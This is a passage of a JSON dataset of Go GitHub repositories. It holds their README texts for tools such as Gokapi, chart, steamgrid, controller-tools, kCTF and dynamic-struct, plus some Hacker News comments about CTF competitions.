PR\nNAME=username\nREMOTE_BRANCH_NAME=abc\ngit remote add $NAME git@github.com:$NAME/kafkactl.git\ngit push $NAME ${LOCAL_BRANCH_NAME}:${REMOTE_BRANCH_NAME}\n```\n", "readme_type": "markdown", "hn_comments": "This is a nice little CLI tool one of my colleagues recently wrote to simplify managing Kafka clusters. Think of kubectl for Apache Kafka.It's a single binary that can easily be dropped on any server.You can configure one or more clusters in a YAML file, so you don't have to remember all Kafka nodes. It also has smart auto-completion for bash and zsh that leverages your configuration file.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Forceu/Gokapi", "link": "https://github.com/Forceu/Gokapi", "tags": ["selfhosted", "self-hosted", "download", "uploader", "firefox-send", "golang", "s3-storage", "backblaze-b2", "ownyourdata", "docker", "ssl"], "stars": 539, "description": "Lightweight selfhosted Firefox Send alternative without public upload. AWS S3 supported.", "lang": "Go", "repo_lang": "", "readme": "# Gokapi\n[![Documentation Status](https://readthedocs.org/projects/gokapi/badge/?version=latest)](https://gokapi.readthedocs.io/en/stable/?badge=stable)\n[![Go Report Card](https://goreportcard.com/badge/github.com/forceu/gokapi)](https://goreportcard.com/report/github.com/forceu/gokapi)\n![gopherbadger-tag-do-not-edit](https://img.shields.io/badge/Go%20Coverage-91%25-brightgreen.svg?longCache=true&style=flat)\n[![Docker Pulls](https://img.shields.io/docker/pulls/f0rc3/gokapi.svg)](https://hub.docker.com/r/f0rc3/gokapi/)\n\n\n### Available for:\n\n- Bare Metal\n- [Docker](https://hub.docker.com/r/f0rc3/gokapi)\n\n## About\n\nGokapi is a lightweight server to share files, which expire after a set amount of downloads or days. It is similar to the discontinued [Firefox Send](https://github.com/mozilla/send), with the difference that only the admin is allowed to upload files. \n\nThis enables companies or individuals to share their files very easily and having them removed afterwards, therefore saving disk space and having control over who downloads the file from the server.\n\nIdentical files will be deduplicated. An API is available to interact with Gokapi. AWS S3 and Backblaze B2 can be used instead of local storage. Customization is very easy with HTML/CSS knowledge. Encryption including end-to-end encryption is available.\n\n\n## Screenshots\nAdmin Menu ![image](https://user-images.githubusercontent.com/1593467/185140322-d6287e6b-ddfc-4987-a2df-9491ba1a2e1d.png)\n\n\nDownload Link ![image](https://user-images.githubusercontent.com/1593467/185140498-2df46c7e-bd95-4f46-8ec5-21ec1e415d90.png)\n\n\n\n\n\n\n## Installation\n\nCan be deployed in only a few seconds. Please refer to the [documentation](https://gokapi.readthedocs.io/en/latest/setup.html)\n\n## Usage\n\nPlease refer to the [documentation](https://gokapi.readthedocs.io/en/latest/usage.html)\n\n## Contributors\n\n \n\n\n## License\n\nThis project is licensed under the AGPL3 - see the [LICENSE.md](LICENSE.md) file for details\n\n\n## Donations\n\nAs with all Free software, the power is less in the finances and more in the collective efforts. I really appreciate every pull request and bug report offered up by our users! If however, you're not one for coding/design/documentation, and would like to contribute financially, you can do so with the link below. 
Every help is very much appreciated!\n\n[![paypal](https://img.shields.io/badge/Donate-PayPal-green.svg)](https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=donate@bulling.mobi&lc=US&item_name=BarcodeBuddy&no_note=0&cn=¤cy_code=EUR&bn=PP-DonationsBF:btn_donateCC_LG.gif:NonHosted) [![LiberaPay](https://img.shields.io/badge/Donate-LiberaPay-green.svg)](https://liberapay.com/MBulling/donate)\n\n\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "marianogappa/chart", "link": "https://github.com/marianogappa/chart", "tags": ["charting-library", "chart", "graphs", "chartjs"], "stars": 538, "description": "Quick & smart charting for STDIN", "lang": "Go", "repo_lang": "", "readme": "# chart [![Build Status](https://img.shields.io/travis/marianogappa/chart.svg)](https://travis-ci.org/marianogappa/chart) [![Coverage Status](https://coveralls.io/repos/github/MarianoGappa/chart/badge.svg?branch=master)](https://coveralls.io/github/MarianoGappa/chart?branch=master) [![GitHub license](https://img.shields.io/badge/license-MIT-blue.svg)](https://raw.githubusercontent.com/marianogappa/chart/master/LICENSE) [![Go Report Card](https://goreportcard.com/badge/github.com/marianogappa/chart?style=flat-square)](https://goreportcard.com/report/github.com/marianogappa/chart)\n\nQuick & smart charting for STDIN\n\n[Blogpost](https://movio.co/en/blog/improving-with-sql-and-charts/)\n\n![Chart example use](img/chart.gif?v=1)\n\n## Learn by example!\n\n[Cheatsheet](https://marianogappa.github.io/chart/)\n\n## Syntax\n\n```\nchart [options]\n```\n\n- `pie`: render a pie chart\n- `bar`: render a bar chart\n- `line`: render a line chart\n- `scatter`: render a scatter plot chart\n- `log`: use logarithmic scale (bar chart only)\n- `legacy-color`: use legacy colors\n- `gradient`: use color gradients\n- `' '|';'|','|'\\t'`: this character separates columns on each line (\\t = default)\n- `-t|--title`: title for the chart\n- `-x`: label for the x axis\n- `-y`: label for the y axis\n- `--date-format`: Sets the date format, according to [https://golang.org/src/time/format.go](https://golang.org/src/time/format.go)\n- `--debug`: Use to make sure to double-check the chart is showing what you expect.\n- `-h|--help`: Show help\n- `--zero-based`: Makes y-axis begin at zero\n\n## Installation\n\n```\ngo get -u github.com/marianogappa/chart\n```\n\nor get the latest binary for your OS in the [Releases section](https://github.com/marianogappa/chart/v4/releases).\n\n## Example use cases\n\n- Pie chart of your most used terminal commands\n```\nhistory | awk '{print $2}' | chart\n```\n\n![Pie chart of your most used terminal commands](img/pie.png?v=1)\n\n- Bar chart of today's currency value against USD, in logarithmic scale\n```\ncurl -s http://api.fixer.io/latest?base=USD | jq -r \".rates | to_entries| \\\n map(\\\"\\(.key)\\t\\(.value|tostring)\\\")|.[]\" | chart bar log -t \"Currency value against USD\"\n```\n\n![Bar chart of today's currency value against USD, in logarithmic scale](img/bar-log.png?v=1)\n\n- Bar chart of a Github user's lines of code per language (requires setting up an Access Token)\n```\nUSER=???\nACCESS_TOKEN=???\ncurl -u $USER:$ACCESS_TOKEN -s \"https://api.github.com/user/repos\" | \\\n jq -r 'map(.languages_url) | .[]' | xargs curl -s -u $USER:$ACCESS_TOKEN | \\\n jq -r '. as $in| keys[] | [.+ \" \"]+[$in[.] 
| tostring] | add' | \\\n awk '{arr[$1]+=$2} END {for (i in arr) {print i,arr[i]}}' | \\\n awk '{print $2 \"\\t\" $1}' | sort -nr | chart bar\n```\n\n![Bar chart of a Github user's lines of code per language (requires setting up an Access Token)](img/bar.png?v=1)\n\n- Line chart of the stargazers of this repo over time up to Jan 2017 (received some attention after the publication of [this](https://movio.co/blog/migrate-Scala-to-Go/) blogpost)\n```\ncurl -s \"https://api.github.com/repos/marianogappa/chart/stargazers?page=1&per_page=100\" \\\n-H\"Accept: application/vnd.github.v3.star+json\" | \\\njq --raw-output 'map(.starred_at) | .[]' | awk '{print NR \"\\t\" $0}' | \\\nchart line --date-format 2006-01-02T15:04:05Z\n```\n\n![Line chart of Github stargazers of this repo over time](img/line.png?v-1)\n\n## Charting MySQL output\n\n`chart` works great with [sql](https://github.com/MarianoGappa/sql), or with any `mysql -Nsre '...'` query.\n\n## I don't trust the chart is correct\n\nMe neither. Add `--debug` to double-check (e.g. some rows could be being ignored due to parse failures, separator could be incorrect, column types could be inferred wrongly).\n\n```\n$ cat /tmp/c | ./chart bar --debug\nLines read 3\nLine format inferred ff\nLines used 3\nFloat column count 2\nString column count 0\nDate/Time column count 0\nChart type bar\nScale type linear\nSeparator [tab]\n```\n\n## Details\n\n- `chart` infers STDIN format by analysing line format on each line (doesn't infer separator though; defaults to `\\t`) and computing the winner format.\n- it uses the awesome [ChartJS](http://www.chartjs.org/) library to plot the charts.\n- when input data is string-only, `chart` infers a \"word frequency pie chart\" use case.\n- should work on Linux/Mac/Windows thanks to [open-golang](https://github.com/skratchdot/open-golang).\n\n## Known issues\n\n- Javascript's floating point messes up y-axis https://github.com/marianogappa/chart/v4/issues/15\n- No histogram support (ChartJS doesn't provide it) https://github.com/marianogappa/chart/v4/issues/22\n\n## Contribute\n\nPRs are greatly appreciated and are currently [being merged](https://github.com/marianogappa/chart/v4/pull/3).\nIf you have a use case that is not supported by `chart`, [I'd love to hear about it](https://github.com/marianogappa/chart/v4/issues), but if it's too complex I'd recommend you to try [gnuplot](http://www.gnuplot.info/).\n\n### Development\n\n- Requires Go version >= 1.11 with module support for building and testing.\n\n- Requires [Goreleaser](https://goreleaser.com) for building and publishing releases.\n\n- See [Makefile](./Makefile) for build and test commands.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "boppreh/steamgrid", "link": "https://github.com/boppreh/steamgrid", "tags": [], "stars": 538, "description": "Downloads images to fill your Steam grid view", "lang": "Go", "repo_lang": "", "readme": "# What is it? #\n\n**SteamGrid** is a standalone, fire-and-forget program to enhance Steam's grid view and Big Picture. It preloads the banner images for all your games (even non-Steam ones) and applies overlays depending on your categories.\n\nYou run it once, and it'll set up everything above, automatically, keeping your existing custom images. 
You can run\nagain when you get more games or want to update the category overlays.\n\n# Download #\n\n[**steamgrid-windows.zip (4.4\u00a0MB)**](https://github.com/boppreh/steamgrid/releases/latest/download/steamgrid_windows.zip)\n\n[**steamgrid-linux.zip (4.5\u00a0MB)**](https://github.com/boppreh/steamgrid/releases/latest/download/steamgrid_linux.zip)\n\n[**steamgrid-mac.zip (4.6\u00a0MB)**](https://github.com/boppreh/steamgrid/releases/latest/download/steamgrid_mac.zip)\n\n# How to use #\n\n1. Download the [latest version](https://github.com/boppreh/steamgrid/releases/latest) and extract the zip wherever.\n2. *(optional)* Name the overlays after your categories. So if you have a category \u201cGames I Love\u201d, put a nice little heart overlay there named `games i love.banner.png`. You can rename the defaults that came with the zip or get new ones at [/r/steamgrid](http://www.reddit.com/r/steamgrid/wiki/overlays).\n * Add the extension `.banner` before the image extension for banner art: `games i love.banner.png`\n * Add the extension `.cover` before the image extension for cover art: `games i love.cover.png`\n * Add the extension `.hero` before the image extension for hero art `games i love.hero.png`\n * Add the extension `.logo` before the image extension for logo art `games i love.logo.png`\n3. *(optional)* Download a pack of custom images and place it in the `games/` folder. The image files can be either the name of the game (e.g. `Psychonauts.banner.png`) or the game id (e.g. `3830.png`).\n * Add the extension `.banner` before the image extension for banner art: `Psychonauts.banner.png`, `3830.png`\n * Add the extension `.cover`/`p` before the image extension for cover art: `Psychonauts.cover.png`, `3830p.png`\n * Add the extension `.hero`/`_hero` before the image extension for hero art `Psychonauts.hero.png`, `3830_hero.png`\n * Add the extension `.logo`/`_hero` before the image extension for logo art `Psychonauts.logo.png`, `3830_logo.png`\n4. *(optional)* Generate a some API Keys to enhance the automatic search:\n * [SteamGridDB API Key](https://www.steamgriddb.com/profile/preferences)\n * [IGDB API Client/Secret](https://api-docs.igdb.com/#about)\n5. Run `steamgrid` and wait. No, really, it's all automatic. Not a single key press required.\n * *(optional)* Append `--steamgriddb ` if you've generated one before.\n * *(optional)* Append `--igdbclient ` if you've genereated one before.\n * *(optional)* Append `--igdbsecret ` if you've genereated one before.\n * *(optional)* Append `--types ` to choose your preferences between animated steam covers or static ones Available choices : `animated`,`static`. Default : `static`. You can use `animated,static` to download both while preferring animated covers, and `static,animated` for preferring static covers.\n * *(optional)* Append `--styles ` to choose your preferences between the different covers styles from steamgriddb. Available choices : `material`,`white_logo`,`alternate`,`blurred`,`no_logo`. Default: `alternate`. You can also input multiple comma-separated choices in the same manners of the `--types` argument.\n * *(optional)* Append `--appids ` to only process the specified appID(s)\n * *(optional)* Append `--onlymissingartwork` to only download artworks missing on the official servers.\n * *(optional)* Append `-nonsteamonly` to only search artworks for non-steam games added onto the Steam client.\n * *(optional)* Append `-skip` to skip searching and downloading parts from certain artwork elements. 
Available choices : `-skipbanner`,`-skipcover`,`-skiphero`,`-skiplogo`. For example: Appending `-skiplogo -skipbanner` will prevent steamgrid to search and download logo and banners for any games.\n * *(optional)* Append `-skipsteam` to not download the default artworks from Steam.\n * *(optional)* Append `-skipgoogle` to skip search and downloads from Google.\n * *(tip)* Run with `--help` to see all available options again.\n6. Read the report and open Steam in grid view to check the results.\n\n---\n\n[![Results](https://i.imgur.com/HiBCe7p.png)](https://i.imgur.com/HiBCe7p.png)\n[![Grid view screenshot](http://i.imgur.com/abnqZ6C.png)](http://i.imgur.com/abnqZ6C.png)\n[![Big Picture screenshot](http://i.imgur.com/gv7xDda.png)](http://i.imgur.com/gv7xDda.png)\n\n# Features #\n\n- Grid images are used both in the grid view and Big Picture mode, and SteamGrid works on both.\n- Automatically detects Steam installation even in foreign language systems. If\n it still doesn't work for you, just drag and drop the Steam installation folder\n onto the executable for a manual override.\n- Detects all local Steam users and customizes their grid images individually.\n- Downloads images from two different servers, and falls back to a Google\n search as last resort (don't worry, it'll tell you if that happens).\n- If a game is missing an official banner *and* a name (common for prototypes), it gets the name\n from SteamDB and google searches the banner.\n- Loads your categories from the local Steam installation.\n- Applies transparent overlays based on each game categories (make sure the name\n of the overlay file is the name of the category).\n- If you already have any customized images, it'll use them and apply the\n overlay, but keeping a backup.\n- If you have images in the directory `games/`, it'll search by game name or by id and use them.\n- Works just as well with non-Steam games.\n- Supports PNG and JPG images.\n- Supports games with multiple categories.\n- No installation required, just extract the zip and double click.\n- Works with Windows, Linux, and macOS, 32 or 64 bit.\n- 100% fire and forget, no interaction required, and can cancel and retry at any moment.\n\n# Something wrong? #\n\n- **Why are there crowns and other icons on top of my images?**: Those are the default overlays for categories, found in the folder `overlays by category/`. You can download new ones, or just delete the file and re-run SteamGrid to remove the overlay.\n- **Fails to find steam location**: You can drag and drop the Steam installation folder (not the library!) into `steamgrid.exe` for a manual override.\n- **A few images were not found**: Some images are hard to find. The program may miss a game, especially betas, prototypes and tests, but you can set an image manually through the Steam client (right click > `Set Custom Image`). Run `steamgrid` again to apply the overlays. If you know a good source of images, drop me a message.\n- **No overlays found**: make sure you put your overlays inside the `overlays by category` folder, and it's near the program itself. This error means absolutely no overlays were found, without even taking your categories names into consideration.\n- **It didn't apply any overlays**: ensure the overlay file name matches your category name, including possible punctuation (differences in caps are ignored). For example, `favorites.png` is used for the `Favorites` category.\n- **I'm worried this is a virus**: I work with security, so no offense taken from a little paranoia. 
The complete source code is provided at this [Github repo](https://github.com/boppreh/steamgrid). If you are worried the binaries don't match the source, you can install Go on your machine and run the sources directly. All it does is save images inside `Steam/userdata/ID/config/grid`. It does connect to the internet, but only to fetch game names from you Steam profile and download images into the Steam's grid image folder. Nothing is installed or saved in the Windows registry, and aside from images downloaded, it should leave the computer exactly as it found.\n\nIf you encounter any problems, please [open an issue](https://github.com/boppreh/steamgrid/issues/new). All critics and suggestions are welcome.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kubernetes-sigs/controller-tools", "link": "https://github.com/kubernetes-sigs/controller-tools", "tags": ["k8s-sig-api-machinery"], "stars": 538, "description": "Tools to use with the controller-runtime libraries", "lang": "Go", "repo_lang": "", "readme": "[![Go Reference](https://pkg.go.dev/badge/sigs.k8s.io/controller-tools.svg)](https://pkg.go.dev/sigs.k8s.io/controller-tools)\n[![Build Status](https://travis-ci.org/kubernetes-sigs/controller-tools.svg?branch=master)](https://travis-ci.org/kubernetes-sigs/controller-tools \"Travis\")\n[![Go Report Card](https://goreportcard.com/badge/sigs.k8s.io/controller-tools)](https://goreportcard.com/report/sigs.k8s.io/controller-tools)\n\n# Kubernetes controller-tools Project\n\nThe Kubernetes controller-tools Project is a set of go libraries for building Controllers.\n\n## Development\n\nClone this project, and iterate on changes by running `./test.sh`.\n\nThis project uses Go modules to manage its dependencies, so feel free to work from outside\nof your `GOPATH`. However, if you'd like to continue to work from within your `GOPATH`, please\nexport `GO111MODULE=on`.\n\n## Releasing and Versioning\n\nSee [VERSIONING.md](VERSIONING.md).\n\n## Community, discussion, contribution, and support\n\nLearn how to engage with the Kubernetes community on the [community page](http://kubernetes.io/community/).\n\ncontroller-tools is a subproject of the [kubebuilder](https://sigs.k8s.io/kubebuilder) project\nin sig apimachinery.\n\nYou can reach the maintainers of this project at:\n\n- Slack channel: [#kubebuilder](http://slack.k8s.io/#kubebuilder)\n- Google Group: [kubebuilder@googlegroups.com](https://groups.google.com/forum/#!forum/kubebuilder)\n\n### Code of conduct\n\nParticipation in the Kubernetes community is governed by the [Kubernetes Code of Conduct](code-of-conduct.md).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "google/kctf", "link": "https://github.com/google/kctf", "tags": [], "stars": 538, "description": "kCTF is a Kubernetes-based infrastructure for CTF competitions. 
For documentation, see", "lang": "Go", "repo_lang": "", "readme": "# kCTF\n[![GKE Deployment](https://github.com/google/kctf/workflows/GKE%20Deployment/badge.svg?branch=master)](https://github.com/google/kctf/actions?query=workflow%3A%22GKE+Deployment%22)\n\nkCTF is a Kubernetes-based infrastructure for CTF competitions.\n\n## Prerequisites\n\n* [gcloud](https://cloud.google.com/sdk/install)\n* [docker](https://docs.docker.com/install/)\n\n## Getting Started / Documentation\n\nFor an introduction to what kCTF is and how it interacts with Kubernetes, see [kCTF in 8 Minutes](https://google.github.io/kctf/introduction.html).\n\nAdditional documentation resources are:\n\n* **[Local Testing Walkthrough](https://google.github.io/kctf/local-testing.html) \u2013 A quick start guide showing you how to build and test challenges locally.**\n* [Google Cloud Walkthrough](https://google.github.io/kctf/google-cloud.html) \u2013 Once you have everything up and running, try deploying to Google Cloud. \n* [Troubleshooting](https://google.github.io/kctf/troubleshooting.html) \u2013 Help with fixing broken challenges.\n* [Security Threat Model](https://google.github.io/kctf/security-threat-model.html) \u2013 Security considerations regarding kCTF including information on assets, risks, and potential attackers.\n", "readme_type": "markdown", "hn_comments": "Shouldn't you be collecting responses from non-homeschoolers too to be able to tell how homeschoolers are \"lonely relative to\" them?I imagine any pre-pandemic data (if that's what you were going against) is going to be skewed in comparison to pandemic data.Thanks for flagging (heh)! I had no idea this was happening but I always learn so much. Bummer there's no beginner quest, I never did get around to finishing last year's challenges.\"[...] WORLDWIDE, EXCEPT FOR QUEBEC, CRIMEA, CUBA, IRAN, SYRIA, NORTH KOREA, and\nSUDAN\"Huh? What's wrong with Quebec?Dig at Apple from the third stage of the beginners' quest;\"Your first thought is \"Why does the display stand need to announce its price? And exactly how much does 999 dollars convert to in Xenonivian Bucklets?\"I notice they're continuing the proud silicon valley start-up tradition of building a website that doesn't actually tell you what Google CTF is :PEven when I click on the beginner's quest, I've got paths, flags, endings, challenges......but nothing to tell me what the hell the thing actually IS!> Q: I got an error: PERMISSION_DENIED: Permission denied.> A: Try picking a different team name, the team name you inserted is already taken.A: How to tell your software was built by security people.Three of the problems in the beginners quest have 2 flags. In two of the problems, the problems themselves tell you that there are two flags (or give you very obvious hints), but I have no idea which one is the third problem that has a second let alone how to get it...could anyone give me a hint?CTF = Capture The Flag(I didn't know what it stood for at first).I'm lost on the beginners task. 
These things always make me feel stupid.Does someone do in-depth posts/videos/talks about any of these (Google or FB) CTF challenges by breaking up what is happening, what, why and how they tried per challenege and how did they finally come to the solution step-by-step?These things have always intimidated me and I'd love to know more.> Q: I got an error: This browser is not supported or 3rd party cookies and data may be disabled.> A: Enable 3rd party cookies.Come on Google, why do you require third party cookies for a competition amongst the most privacy conscience people on the planet?Firefox ext:Canvas blocker crashes on your site.I\u2019m always amazed how a company that creates the world\u2019s most popular mobile OS and web browser is unable to code a decent mobile webpage.Scrolling this page is sufferable, anchor links don\u2019t work well, etc. Basic stuff.Look no further than G Suite, Google Cloud for more examples.> Eligibility: The Contest is open to individuals who are (1) over the age of eighteen (18) at the time of entry; (2) not a resident of Quebec, Cuba, Iran, Syria, North Korea, Sudan, or Crimea; [1]Why Quebec is banned?https://buildyourfuture.withgoogle.com/events/ctf/#!?detail-...Can\u2019t wait until Facebook team wins itAcronyms suckI don't know about anyone else but this is a pretty hard ctf. It's a lot harder than other ones onlinestuck on https://govagriculture.web.ctfcompetition.com/ this task, any help?The emoji virtual machine (step 3 or 4) is cool. I'm trying to understand what it does to speed it up.There is no magic. You have to try things. There are two things that worked for me personally:* Study the technology in order to find out potential oversights and design problems.\n* Fuzz test it to find problems by brute force.Keep in mind that the more you practice the better you become at it. Your intuition will start to help you filter things that are worth exploring and as such get more fruitful results faster. While you can read about vulnerability research techniques, your intuition will only grow through practice and experience.Also the more bugs you discover the more confident you become which also helps in the long run because in many situations you will not know what you are doing but you believe strongly that you will find something.Also, keep in mind that while security researcher are smart people, what they do is not that genius at the end of the day. When you are reading someones awesome research you may come to the conclusion that the work had the same logical development as outlined in the paper - a stroke of a genius. It does not work quite like that in reality. It only makes sense at the end. It does not make that much sense in the process. You just fake it until you make it. :)So yah, the way you make the jump from using tools to finding vulnerabilities yourself is by making that jump. Pick a small target area of research first and grow from there.fwiw, if you have the Instapaper extension installed it has the option to insert itself into Hacker News among other sites.The official Pocket Chrome extension also inserts itself inline onto HN pages. 
Not to mention, it appears this extension hasn't been updated in over 2 years.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Ompluscator/dynamic-struct", "link": "https://github.com/Ompluscator/dynamic-struct", "tags": ["go", "golang", "dynamic", "structs", "runtime"], "stars": 538, "description": "Golang package for editing struct's fields during runtime and mapping structs to other structs.", "lang": "Go", "repo_lang": "", "readme": "[![Go Reference](https://pkg.go.dev/badge/github.com/Ompluscator/dynamic-struct.svg)](https://pkg.go.dev/github.com/Ompluscator/dynamic-struct)\n![Coverage](https://img.shields.io/badge/Coverage-92.6%25-brightgreen)\n[![Go Report Card](https://goreportcard.com/badge/github.com/ompluscator/dynamic-struct)](https://goreportcard.com/report/github.com/ompluscator/dynamic-struct)\n\n# Golang dynamic struct\n\nPackage dynamic struct provides possibility to dynamically, in runtime,\nextend or merge existing defined structs or to provide completely new struct.\n\nMain features:\n* Building completely new struct in runtime\n* Extending existing struct in runtime\n* Merging multiple structs in runtime\n* Adding new fields into struct\n* Removing existing fields from struct\n* Modifying fields' types and tags\n* Easy reading of dynamic structs\n* Mapping dynamic struct with set values to existing struct\n* Make slices and maps of dynamic structs\n\nWorks out-of-the-box with:\n* https://github.com/go-playground/form\n* https://github.com/go-playground/validator\n* https://github.com/leebenson/conform\n* https://golang.org/pkg/encoding/json/\n* ...\n\n## Benchmarks\n\nEnvironment:\n* MacBook Pro (13-inch, Early 2015), 2,7 GHz Intel Core i5\n* go version go1.11 darwin/amd64\n\n```\ngoos: darwin\ngoarch: amd64\npkg: github.com/ompluscator/dynamic-struct\nBenchmarkClassicWay_NewInstance-4 2000000000 0.34 ns/op\nBenchmarkNewStruct_NewInstance-4 10000000 141 ns/op\nBenchmarkNewStruct_NewInstance_Parallel-4 20000000 89.6 ns/op\nBenchmarkExtendStruct_NewInstance-4 10000000 135 ns/op\nBenchmarkExtendStruct_NewInstance_Parallel-4 20000000 89.5 ns/op\nBenchmarkMergeStructs_NewInstance-4 10000000 140 ns/op\nBenchmarkMergeStructs_NewInstance_Parallel-4 20000000 94.3 ns/op\n```\n\n## Add new struct\n```go\npackage main\n\nimport (\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"log\"\n\n\t\"github.com/ompluscator/dynamic-struct\"\n)\n\nfunc main() {\n\tinstance := dynamicstruct.NewStruct().\n\t\tAddField(\"Integer\", 0, `json:\"int\"`).\n\t\tAddField(\"Text\", \"\", `json:\"someText\"`).\n\t\tAddField(\"Float\", 0.0, `json:\"double\"`).\n\t\tAddField(\"Boolean\", false, \"\").\n\t\tAddField(\"Slice\", []int{}, \"\").\n\t\tAddField(\"Anonymous\", \"\", `json:\"-\"`).\n\t\tBuild().\n\t\tNew()\n\n\tdata := []byte(`\n{\n \"int\": 123,\n \"someText\": \"example\",\n \"double\": 123.45,\n \"Boolean\": true,\n \"Slice\": [1, 2, 3],\n \"Anonymous\": \"avoid to read\"\n}\n`)\n\n\terr := json.Unmarshal(data, &instance)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tdata, err = json.Marshal(instance)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tfmt.Println(string(data))\n\t// Out:\n\t// {\"int\":123,\"someText\":\"example\",\"double\":123.45,\"Boolean\":true,\"Slice\":[1,2,3]}\n}\n```\n\n## Extend existing struct\n```go\npackage main\n\nimport (\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"log\"\n\n\t\"github.com/ompluscator/dynamic-struct\"\n)\n\ntype Data struct {\n\tInteger int `json:\"int\"`\n}\n\nfunc main() {\n\tinstance := 
dynamicstruct.ExtendStruct(Data{}).\n\t\tAddField(\"Text\", \"\", `json:\"someText\"`).\n\t\tAddField(\"Float\", 0.0, `json:\"double\"`).\n\t\tAddField(\"Boolean\", false, \"\").\n\t\tAddField(\"Slice\", []int{}, \"\").\n\t\tAddField(\"Anonymous\", \"\", `json:\"-\"`).\n\t\tBuild().\n\t\tNew()\n\n\tdata := []byte(`\n{\n \"int\": 123,\n \"someText\": \"example\",\n \"double\": 123.45,\n \"Boolean\": true,\n \"Slice\": [1, 2, 3],\n \"Anonymous\": \"avoid to read\"\n}\n`)\n\n\terr := json.Unmarshal(data, &instance)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tdata, err = json.Marshal(instance)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tfmt.Println(string(data))\n\t// Out:\n\t// {\"int\":123,\"someText\":\"example\",\"double\":123.45,\"Boolean\":true,\"Slice\":[1,2,3]}\n}\n```\n\n## Merge existing structs\n```go\npackage main\n\nimport (\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"log\"\n\n\t\"github.com/ompluscator/dynamic-struct\"\n)\n\ntype DataOne struct {\n\tInteger int `json:\"int\"`\n\tText string `json:\"someText\"`\n\tFloat float64 `json:\"double\"`\n}\n\ntype DataTwo struct {\n\tBoolean bool\n\tSlice []int\n\tAnonymous string `json:\"-\"`\n}\n\nfunc main() {\n\tinstance := dynamicstruct.MergeStructs(DataOne{}, DataTwo{}).\n\t\tBuild().\n\t\tNew()\n\n\tdata := []byte(`\n{\n\"int\": 123,\n\"someText\": \"example\",\n\"double\": 123.45,\n\"Boolean\": true,\n\"Slice\": [1, 2, 3],\n\"Anonymous\": \"avoid to read\"\n}\n`)\n\n\terr := json.Unmarshal(data, &instance)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tdata, err = json.Marshal(instance)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tfmt.Println(string(data))\n\t// Out:\n\t// {\"int\":123,\"someText\":\"example\",\"double\":123.45,\"Boolean\":true,\"Slice\":[1,2,3]}\n}\n```\n\n## Read dynamic struct\n\n```go\npackage main\n\nimport (\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"log\"\n\n\t\"github.com/ompluscator/dynamic-struct\"\n)\n\ntype DataOne struct {\n\tInteger int `json:\"int\"`\n\tText string `json:\"someText\"`\n\tFloat float64 `json:\"double\"`\n}\n\ntype DataTwo struct {\n\tBoolean bool\n\tSlice []int\n\tAnonymous string `json:\"-\"`\n}\n\nfunc main() {\n\tinstance := dynamicstruct.MergeStructs(DataOne{}, DataTwo{}).\n\t\tBuild().\n\t\tNew()\n\n\tdata := []byte(`\n{\n\"int\": 123,\n\"someText\": \"example\",\n\"double\": 123.45,\n\"Boolean\": true,\n\"Slice\": [1, 2, 3],\n\"Anonymous\": \"avoid to read\"\n}\n`)\n\n\terr := json.Unmarshal(data, &instance)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\treader := dynamicstruct.NewReader(instance)\n\n\tfmt.Println(\"Integer\", reader.GetField(\"Integer\").Int())\n\tfmt.Println(\"Text\", reader.GetField(\"Text\").String())\n\tfmt.Println(\"Float\", reader.GetField(\"Float\").Float64())\n\tfmt.Println(\"Boolean\", reader.GetField(\"Boolean\").Bool())\n\tfmt.Println(\"Slice\", reader.GetField(\"Slice\").Interface().([]int))\n\tfmt.Println(\"Anonymous\", reader.GetField(\"Anonymous\").String())\n\n\tvar dataOne DataOne\n\terr = reader.ToStruct(&dataOne)\n\tfmt.Println(err, dataOne)\n\n\tvar dataTwo DataTwo\n\terr = reader.ToStruct(&dataTwo)\n\tfmt.Println(err, dataTwo)\n\t// Out:\n\t// Integer 123\n\t// Text example\n\t// Float 123.45\n\t// Boolean true\n\t// Slice [1 2 3]\n\t// Anonymous\n\t// {123 example 123.45}\n\t// {true [1 2 3] }\n}\n```\n\n## Make a slice of dynamic struct\n\n```go\npackage main\n\nimport (\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"log\"\n\n\t\"github.com/ompluscator/dynamic-struct\"\n)\n\ntype Data struct {\n\tInteger int `json:\"int\"`\n\tText string 
